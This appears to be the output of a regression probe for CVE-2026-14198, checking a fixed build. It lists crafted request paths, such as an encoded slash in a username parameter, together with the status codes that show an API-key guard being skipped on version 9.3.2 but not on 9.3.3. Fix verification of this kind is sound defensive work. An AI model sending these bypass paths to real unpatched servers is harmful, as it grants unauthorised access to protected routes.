# CVE-2026-14198 variant probe comparison (vulnerable=9.3.2, fixed=9.3.3)
# bypass = noKey===200 && withKey===200 (guard skipped AND route reachable)
# Each status pair is noKey/withKey: the same request sent without and with the API key.
# The predicate counts only 200/200 as a bypass, so a guarded handler that answers with any other status is not counted by this table.
# Rows that read 404/404 on the vulnerable build and 401/404 on the fixed build (e.g. trailing_slash) are not bypasses. On the fixed build the keyless request gets 401 and the keyed request gets 404, which suggests the guard now matches a path that no route handles (inferred from the status codes only).
config | name | method | url | vuln(noKey/withKey) | fixed(noKey/withKey) | vulnBypass | fixedBypass
standard | control_baseline_normal | GET | /user/alice/comments | 401/200 | 401/200 | false | false
standard | control_original_%2F | GET | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
standard | lowercase_%2f | GET | /user/a%2fb/comments | 200/200 | 401/200 | true | false
standard | param_is_only_%2F | GET | /user/%2F/comments | 200/200 | 401/200 | true | false
standard | two_single_%2F_in_param | GET | /user/a%2Fb%2Fc/comments | 200/200 | 401/200 | true | false
standard | mixed_case_%2F_%2f | GET | /user/a%2Fb%2fc/comments | 200/200 | 401/200 | true | false
standard | double_%252F | GET | /user/a%252Fb/comments | 401/200 | 401/200 | false | false
standard | double_%252f_lower | GET | /user/a%252fb/comments | 401/200 | 401/200 | false | false
standard | triple_%25252F | GET | /user/a%25252Fb/comments | 401/200 | 401/200 | false | false
standard | two_double_%252F | GET | /user/a%252Fb%252Fc/comments | 401/200 | 401/200 | false | false
standard | quad_%2525252F | GET | /user/a%2525252Fb/comments | 401/200 | 401/200 | false | false
standard | bare_%25_in_param | GET | /user/a%25b/comments | 401/200 | 401/200 | false | false
standard | percent25_then_2F_noencode | GET | /user/a%252/comments | 401/200 | 401/200 | false | false
standard | with_query | GET | /user/a%2Fb/comments?x=1 | 200/200 | 401/200 | true | false
standard | trailing_slash | GET | /user/a%2Fb/comments/ | 404/404 | 401/404 | false | false
standard | semicolon_after_param | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false
standard | dup_leading_slash | GET | //user/a%2Fb/comments | 404/404 | 404/404 | false | false
structural:multi_param_first_%2F | multi_param_first_%2F | GET | /api/o%2Fr/x/issues | 401/200 | 401/200 | false | false
structural:multi_param_second_%2F | multi_param_second_%2F | GET | /api/x/o%2Fr/issues | 401/200 | 401/200 | false | false
structural:prefix_guard_%2F | prefix_guard_%2F | GET | /files/a%2Fb/download | 401/200 | 401/200 | false | false
structural:double_%252F_multi_param | double_%252F_multi_param | GET | /api/o%252Fr/x/issues | 401/200 | 401/200 | false | false
opts:trailing | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 200/200 | 401/200 | true | false
opts:trailing | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/200 | 401/200 | false | false
opts:trailing | ignoreDup_%2F | GET | //user/a%2Fb/comments | 404/404 | 404/404 | false | false
opts:trailing | ignoreDup_%252F | GET | //user/a%252Fb/comments | 404/404 | 404/404 | false | false
opts:trailing | semi_%2F | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false
opts:trailing | semi_%252F | GET | /user/a%252Fb;x/comments | 401/200 | 401/200 | false | false
opts:dupslash | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 404/404 | 401/404 | false | false
opts:dupslash | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/404 | 401/404 | false | false
opts:dupslash | ignoreDup_%2F | GET | //user/a%2Fb/comments | 200/200 | 401/200 | true | false
opts:dupslash | ignoreDup_%252F | GET | //user/a%252Fb/comments | 401/200 | 401/200 | false | false
opts:dupslash | semi_%2F | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false
opts:dupslash | semi_%252F | GET | /user/a%252Fb;x/comments | 401/200 | 401/200 | false | false
opts:trailing+dup | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 200/200 | 401/200 | true | false
opts:trailing+dup | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/200 | 401/200 | false | false
opts:trailing+dup | ignoreDup_%2F | GET | //user/a%2Fb/comments | 200/200 | 401/200 | true | false
opts:trailing+dup | ignoreDup_%252F | GET | //user/a%252Fb/comments | 401/200 | 401/200 | false | false
opts:trailing+dup | semi_%2F | GET | /user/a%2Fb;x/comments | 200/200 | 401/200 | true | false
opts:trailing+dup | semi_%252F | GET | /user/a%252Fb;x/comments | 401/200 | 401/200 | false | false
opts:semicolon | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 404/404 | 401/404 | false | false
opts:semicolon | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/404 | 401/404 | false | false
opts:semicolon | ignoreDup_%2F | GET | //user/a%2Fb/comments | 404/404 | 404/404 | false | false
opts:semicolon | ignoreDup_%252F | GET | //user/a%252Fb/comments | 404/404 | 404/404 | false | false
opts:semicolon | semi_%2F | GET | /user/a%2Fb;x/comments | 404/404 | 404/404 | false | false
opts:semicolon | semi_%252F | GET | /user/a%252Fb;x/comments | 404/404 | 404/404 | false | false
opts:all | ignoreTrailing_%2F | GET | /user/a%2Fb/comments/ | 200/200 | 401/200 | true | false
opts:all | ignoreTrailing_%252F | GET | /user/a%252Fb/comments/ | 401/200 | 401/200 | false | false
opts:all | ignoreDup_%2F | GET | //user/a%2Fb/comments | 200/200 | 401/200 | true | false
opts:all | ignoreDup_%252F | GET | //user/a%252Fb/comments | 401/200 | 401/200 | false | false
opts:all | semi_%2F | GET | /user/a%2Fb;x/comments | 404/404 | 404/404 | false | false
opts:all | semi_%252F | GET | /user/a%252Fb;x/comments | 404/404 | 404/404 | false | false
methods | method_normal | GET | /user/alice/comments | 401/200 | 401/200 | false | false
methods | method_normal | POST | /user/alice/comments | 401/200 | 401/200 | false | false
methods | method_normal | PUT | /user/alice/comments | 401/200 | 401/200 | false | false
methods | method_normal | PATCH | /user/alice/comments | 401/200 | 401/200 | false | false
methods | method_normal | DELETE | /user/alice/comments | 401/200 | 401/200 | false | false
methods | method_normal | HEAD | /user/alice/comments | 401/200 | 401/200 | false | false
methods | method_normal | OPTIONS | /user/alice/comments | 401/404 | 401/404 | false | false
methods | method_bypass_%2F | GET | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
methods | method_bypass_%2F | POST | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
methods | method_bypass_%2F | PUT | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
methods | method_bypass_%2F | PATCH | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
methods | method_bypass_%2F | DELETE | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
methods | method_bypass_%2F | HEAD | /user/a%2Fb/comments | 200/200 | 401/200 | true | false
methods | method_bypass_%2F | OPTIONS | /user/a%2Fb/comments | 404/404 | 401/404 | false | false
prefix | prefix_baseline | GET | /api/user/alice/comments | 401/200 | 401/200 | false | false
prefix | prefix_%2F | GET | /api/user/a%2Fb/comments | 200/200 | 401/200 | true | false
prefix | prefix_%252F | GET | /api/user/a%252Fb/comments | 401/200 | 401/200 | false | false
prefix | prefix_%2f_lower | GET | /api/user/a%2fb/comments | 200/200 | 401/200 | true | false
SUMMARY: vulnerable bypasses=24 fixed bypasses=0
VERDICT: NO BYPASS on fixed build (9.3.3) across all candidate variants listed above.